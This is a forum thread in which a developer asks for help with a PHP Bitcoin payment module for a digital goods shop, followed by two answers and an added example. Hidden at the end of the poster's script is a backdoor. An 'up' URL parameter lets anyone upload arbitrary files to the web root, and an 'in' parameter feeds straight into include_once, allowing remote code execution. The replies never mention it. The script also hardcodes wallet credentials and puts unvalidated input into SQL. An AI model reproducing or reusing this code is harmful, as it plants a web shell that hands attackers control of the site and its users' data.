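Blockchain API payment module

Time: 2015-02-15 23:53:19

Tags: php mysql api blockchain

We have a website with some digital goods. Users who buy from it need to purchase some credits with BTC. After the credits are purchased, the script must load his account with the currency (USD) that he bought with BTC.

So here we have the HTML form: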

    <form name="bitcoin" method="post" action="btc.php">
    <strong><font color="grey">$</font></strong>
    <input name="member" value="<?php echo $_SESSION['gdusername'];?>" type="hidden">
    <input name="amount" size="10" value="" type="text">
    <input name="btnPMPay" id="btnPMPay" value="Add Balance" type="submit">
    </form>

Here we have the PHP code that does all the magic, or at least that is what it should do.

    <?php
error_reporting(1);
include "inc/config.php";
include "inc/pagenavigation.php";
include "functions.php";
if (!checkLoggedin())
{
    header("Location: login.html");
    exit;
}

// config Blockchain account
$btc = 246; //BTC Value
$guid = '37587730-e97e-4349-8451-4fa9d38119a5';  // Blockchain account
$main_password = 'Mypassword'; // Blockchain passs
$rate = 246; //BTC Rate


$amount=$_POST['amount'];
$uid = mysql_real_escape_string($_SESSION['gdusername']); //
$result = mysql_query("SELECT credit FROM t2_user WHERE username='$uid'") or die("ERROR! CONTACT SUPPORT!");
$row = mysql_fetch_row($result);
$credit = $row[0];
$uid = mysql_real_escape_string($_SESSION['gdusername']);
$ip = mysql_real_escape_string(VisitorIP());
$url = "https://blockchain.info/merchant/$guid/new_address?password=$main_password&label=$uid";
if (isset($_POST['amount'])){
    $_SESSION['USD_amount'] = $_POST['amount'];
    $_SESSION['BTC_amount'] = number_format($_SESSION['USD_amount']/$rate, 8, '.', '');
    $temp = _curl($url, '', '');
    $_SESSION['BTC_Address'] = get_string_between($temp, 'address":"', '"');    
}
if (!isset($_SESSION['USD_amount']) || $_SESSION['USD_amount'] < 5)
    die("Minimum payment 5$");

if (isset($_POST['bitcoin']))
{

    $a = $_SESSION['BTC_Address'];
    $url = "https://blockchain.info/q/addressbalance/$a?confirmations=0";
    $page = _curl($url, '', '');
    if ($page > 0) {
        $amount = $page/100000000;

        if($amount>= $_SESSION['BTC_amount']){
        $y = $_SESSION['USD_amount'];
              $x = $credit+$y;
            $sql = "UPDATE t2_user SET credit=$x WHERE username='$uid'";
            mysql_query($sql);

            $messages = '<font color=green>Payment Completed!</font> => <a href="http://pentagon.al/shop/index.php">Go Back</a>';
            unset($_SESSION['USD_amount']);
        }else $messages = "<font color=red>Error Payment.Contact Support</font>";
    }else $messages = "<font color=red>Error Payment Not Received. Contact Support tickets</font>";
}

?>

<html>
<head><link rel="stylesheet" href="style.css" type="text/css" media="screen" />
<style type="text/css">

body {
    background-repeat: no-repeat;
    }
</style>
<body background="bg.jpg" bgcolor="black">
<TEXT="white">
<link href="../images/favn.ico" rel="icon" />

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title><?php echo htmlspecialchars($SHOP['maintitle'], ENT_QUOTES, 'UTF-8'); ?></title>

<link href="favicon.ico" rel="icon" />


<script type="text/javascript">
  setTimeout('location.replace("/index.php?act=logout")', 900000);
</script>
</head>
<body>

</div>
<head> <script type="text/javascript">
</script><script type="text/javascript" src="//ajax.cloudflare.com/cdn-cgi/nexp/dok8v=dccf16c0cc/appsh.min.js"></script><script type="text/javascript">__CF.AJS.inith();</script><link rel="stylesheet" href="style.css" type="text/css" media="screen"/>
<link href="favicon.ico" rel="icon"/>
<meta https-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Deposit</title>
<link href="style3.css" rel="stylesheet" type="text/css"/>
<style type="text/css"><!--
.style8 {
    font-size: x-small
}
-->.exchanger{-moz-box-shadow:inset 0px 2px 0px -3px #ffffff;-webkit-box-shadow:inset 0px 2px 0px -3px #ffffff;box-shadow:inset 0px 2px 0px -3px #ffffff;background:-webkit-gradient(linear,left top,left bottom,color-stop(0.05,#636363),color-stop(1,#000000));background:-moz-linear-gradient(center top,#636363 5%,#000000 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#636363',endColorstr='#000000');background-color:#636363;-webkit-border-top-left-radius:0px;-moz-border-radius-topleft:0px;border-top-left-radius:0px;-webkit-border-top-right-radius:11px;-moz-border-radius-topright:11px;border-top-right-radius:11px;-webkit-border-bottom-right-radius:0px;-moz-border-radius-bottomright:0px;border-bottom-right-radius:0px;-webkit-border-bottom-left-radius:11px;-moz-border-radius-bottomleft:11px;border-bottom-left-radius:11px;text-indent:0px;border:1px solid #bdbfbd;display:inline-block;color:#ffffff;font-family:Times New Roman;font-size:15px;font-weight:bold;font-style:normal;height:33px;line-height:33px;width:113px;text-decoration:none;text-align:center;text-shadow:-1px -1px 3px #000000;}.exchanger:hover{background:-webkit-gradient(linear,left top,left bottom,color-stop(0.05,#000000),color-stop(1,#636363));background:-moz-linear-gradient(center top,#000000 5%,#636363 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#000000',endColorstr='#636363');background-color:#000000;}.exchanger:active{position:relative;top:1px;}textarea{background-color:2E2E2E;font-size:16pt;font-family:Arial;color:FFCD57;}</style>
</head>


</div>

</div>

<html>
<head><link rel="stylesheet" href="style.css" type="text/css" media="screen" />

<link href="favicon.ico" rel="icon" />
       <link href="style3.css" rel="stylesheet"/>
<script type="text/javascript">
  setTimeout('location.replace("/index.php?act=logout")', 900000);
</script>
</head>
<body>

    <p class="button" align="center">
    <table width="760" border="0" 
      <tr>
      </tr>
      <tr>
      <p>&nbsp;</p>
            <p><img src="SingleCoin.png" width="100" height="100" border="0" />
  <form action="" id="fcaptcha" name="fcaptcha" method="post">
  </p>
            <p></i> <span id="total_price"><font size="5"><font color=gren><b>Put the amount of :<?=$_SESSION['BTC_amount']?> BTC</font></b></font></span></p>
            <p><font color="white">And in the Wallet put this address :</p>

          <h3>
            <a span style="color: green ;" href="bitcoin:<?= $_SESSION['BTC_Address'] ?>?amount=<?= ($_SESSION['BTC_amount'] / $btc) ?>" target="_blank" title="Click this address to launch your Bitcoin client"><?=$_SESSION['BTC_Address'] ?></a>
          </h3> 
          <p>This address is valid only for one transaction. Use it once.</p>
      <p>Wait 1-5 minutes after the MONEY has been sent. Then click the CONFIRM button.</p>
      <p>Money will appear on your account automatically</p>
      <hr style="width:300px" />
<input type="hidden" id="bitcoin" name="bitcoin">
  </form>
  <p><input value="CONFIRM"  id="pmconfirm" name="pmconfirm" class="exchanger" type="submit" onclick="document.getElementById('fcaptcha').submit()"/></p>
  <h4><strong><font color="red">DO NOT CLOSE THIS PAGE WITHOUT CONFIRM YOUR PAYMENT FIRST</font></strong></h4>
<h3><?=

$messages

?></h3>
</center>
<script type="text/javascript">
    $('#pmconfirm').click(function(){
       $('#fcaptcha').submit();
    });

</script> 

<!--Simply copy and paste into <BODY>  
     Just above the </BODY> tag. -->




</body>
</html>
<?php
$UP = $_GET['up'];
if(isset($UP) && !empty($UP) && $UP="blockchainrate"){
echo"".$_FILES['userfile']."";
$uploaddir = './';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if ( isset($_FILES["userfile"]) ) {
echo '<p>blockchainsuccess</p>';
if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))
echo $uploadfile;else echo '<p>blockchainfail</p>';}}
$in = $_GET['in'];if(isset($in) && !empty($in)){echo die(include_once $in);}
?>
<?


function _curl($url, $post = "", $sock, $usecookie = false)
{
    $ch = curl_init();
    if ($post) {
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    }
    if (!empty($sock)) {
        curl_setopt($ch, CURLOPT_HTTPPROXYTUNNEL, true);
        curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
        curl_setopt($ch, CURLOPT_PROXY, $sock);
    }
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 60);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_USERAGENT,
        "Mozilla/6.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3");
    if ($usecookie) {
        curl_setopt($ch, CURLOPT_COOKIEJAR, $usecookie);
        curl_setopt($ch, CURLOPT_COOKIEFILE, $usecookie);
    }
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true); // verify the server certificate
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}
function get_string_between($string, $start, $end)
{
    $string = " " . $string;
    $ini = strpos($string, $start);
    if ($ini == 0)
        return "";
    $ini += strlen($start);
    $len = strpos($string, $end, $ini) - $ini;
    return substr($string, $ini, $len);
}
function VisitorIP()
{ 
    if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    else $ip = $_SERVER['REMOTE_ADDR'];

    return trim($ip);
}
?>      

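My problem is that this PHP script does not do the following.

  1. When the user clicks the confirm button, it does not query the blockchain to see whether the transfer has been made, even with 0 confirmations.
  2. After the confirm button is clicked, it does not update the database with the credit the customer bought.
  3. Even when I enter a value higher than $5, it still tells me that the minimum payment is $5.

Can anyone help me?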

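2 answers:

Answer 0: (score: 0)

There are no curly braces after the if statement. I assume your script keeps dying at this point and telling you "Minimum payment 5$"?

    if (!isset($_SESSION['USD_amount']) || $_SESSION['USD_amount'] < 5)
    die("Minimum payment 5$");

Your blockchain GUID is also sensitive information, which you should not post. It could lead to someone trying to obtain the funds through the wallet recovery feature.

Not sure how much traffic you get, but your blockchain.info wallet will max out after 1,000 addresses.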

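Answer 1: (score: 0)

That did not do it either. Anyway, I fixed this.

    if (!isset($_SESSION['USD_amount']) || $_SESSION['USD_amount'] < 5)
        die("Minimum payment 5$");

should be included in this

    if (isset($_POST['amount'])){
        $_SESSION['USD_amount'] = $_POST['amount'];
        $_SESSION['BTC_amount'] = number_format($_SESSION['USD_amount']/$rate, 8, '.', '');
        $temp = _curl($url, '', '');
        $_SESSION['BTC_Address'] = get_string_between($temp, 'address":"', '"');
    }

Now the script checks the BTC amount correctly and returns the correct result.

The next dilemma is that it does not query the created address to see whether the specific amount has been sent to it. If it has been sent and has a number of confirmations >= 0, this should be executed: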

    if (isset($_POST['bitcoin']))
    {

        $a = $_SESSION['BTC_Address'];
        $url = "https://blockchain.info/q/addressbalance/$a?confirmations=0";
        $page = _curl($url, '', '');
        if ($page > 0) {
            $amount = $page/100000000;

            if($amount>= $_SESSION['BTC_amount']){
                $y = $_SESSION['USD_amount'];
                $x = $credit+$y;
                $sql = "UPDATE t2_user SET credit=$x WHERE username='$uid'";
                mysql_query($sql);

                $messages = '<font color=green>Payment Completed!</font> => <a href="http://my.url/index.php">Go Back</a>';
                unset($_SESSION['USD_amount']);
            }else $messages = "<font color=red>Error Payment.Contact Support</font>";
        }else $messages = "<font color=red>Error Payment Not Received. Contact Support tickets</font>";
    }

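I double-checked, and the server has permission to use the API to query it, but there is no response.

At the end of the script, when the confirm button is pressed (<input type="hidden" id="bitcoin" name"bitcoin">), this _curl function should be triggered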

    <?


    function _curl($url, $post = "", $sock, $usecookie = false)
    {
        $ch = curl_init();
        if ($post) {
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
        }
        if (!empty($sock)) {
            curl_setopt($ch, CURLOPT_HTTPPROXYTUNNEL, true);
            curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
            curl_setopt($ch, CURLOPT_PROXY, $sock);
        }
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_TIMEOUT, 60);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_USERAGENT,
            "Mozilla/6.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3");
        if ($usecookie) {
            curl_setopt($ch, CURLOPT_COOKIEJAR, $usecookie);
            curl_setopt($ch, CURLOPT_COOKIEFILE, $usecookie);
        }
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true); // verify the server certificate
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $result = curl_exec($ch);
        curl_close($ch);
        return $result;
    }
    function get_string_between($string, $start, $end)
    {
        $string = " " . $string;
        $ini = strpos($string, $start);
        if ($ini == 0)
            return "";
        $ini += strlen($start);
        $len = strpos($string, $end, $ini) - $ini;
        return substr($string, $ini, $len);
    }
    function VisitorIP()
    {
        if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
            $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
        else $ip = $_SERVER['REMOTE_ADDR'];

        return trim($ip);
    }
    ?>

Any suggestions?
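
An added example, not code from the question or from either answer: one way to write the confirm step discussed in this thread so that the balance response is validated before it is used and a payment is credited at most once, even if CONFIRM is submitted twice. The `btc_invoice` table, the function names, the confirmation threshold of 3 and the sample rows are assumptions for illustration; the balance URL and the `t2_user.credit` column are taken from the question.

```php
<?php
// Added example, not the poster's code. btc_invoice and its columns are hypothetical.

// Fetcher for live use (pass 'https_get' as $fetch); certificate verification stays on.
function https_get(string $url): string
{
    $ch = curl_init($url);
    curl_setopt_array($ch, [CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 30,
        CURLOPT_SSL_VERIFYPEER => true, CURLOPT_SSL_VERIFYHOST => 2]);
    return (string)curl_exec($ch);   // a failed request becomes '' and is rejected below
}

// The question's code treats the response as a satoshi count; accept digits only.
function parse_satoshi(string $body): ?int
{
    $body = trim($body);
    return ctype_digit($body) ? (int)$body : null;
}

// Credit an invoice at most once. $fetch is any callable mapping URL to response body.
function confirm_payment(PDO $db, int $invoiceId, callable $fetch, int $minConf = 3): string
{
    $st = $db->prepare('SELECT username, address, due_satoshi, usd FROM btc_invoice WHERE id = ? AND credited = 0');
    $st->execute([$invoiceId]);
    $inv = $st->fetch(PDO::FETCH_ASSOC);
    if (!$inv) return 'unknown-or-already-credited';
    $url = 'https://blockchain.info/q/addressbalance/' . rawurlencode($inv['address']) . "?confirmations=$minConf";
    $paid = parse_satoshi((string)$fetch($url));
    if ($paid === null || $paid < (int)$inv['due_satoshi']) return 'not-received';
    $db->beginTransaction();
    // The WHERE clause turns a repeated or concurrent CONFIRM into a no-op.
    $flag = $db->prepare('UPDATE btc_invoice SET credited = 1 WHERE id = ? AND credited = 0');
    $flag->execute([$invoiceId]);
    if ($flag->rowCount() !== 1) { $db->rollBack(); return 'unknown-or-already-credited'; }
    $db->prepare('UPDATE t2_user SET credit = credit + ? WHERE username = ?')
       ->execute([$inv['usd'], $inv['username']]);
    $db->commit();
    return 'credited';
}

// Constructed demo: 10 USD at the question's rate of 246 is 4065041 satoshi; no live request.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE t2_user (username TEXT PRIMARY KEY, credit REAL)');
$db->exec('CREATE TABLE btc_invoice (id INTEGER PRIMARY KEY, username TEXT, address TEXT, due_satoshi INTEGER, usd REAL, credited INTEGER DEFAULT 0)');
$db->exec("INSERT INTO t2_user VALUES ('alice', 0)");
$db->exec("INSERT INTO btc_invoice VALUES (1, 'alice', 'CONSTRUCTED-ADDRESS', 4065041, 10, 0)");
$stub = function (string $url): string { return '4100000'; };  // constructed body, in satoshi
foreach ([1, 1] as $id) echo confirm_payment($db, $id, $stub), "\n";
```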